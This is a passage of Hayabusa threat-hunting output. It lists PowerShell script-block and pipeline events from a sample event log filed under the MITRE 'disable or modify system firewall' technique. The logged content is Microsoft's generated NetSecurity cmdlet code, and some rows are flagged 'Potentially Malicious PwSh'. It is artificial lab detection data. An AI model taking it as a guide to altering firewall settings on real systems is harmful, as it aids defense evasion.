$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.500 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.500 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.501 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.501 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 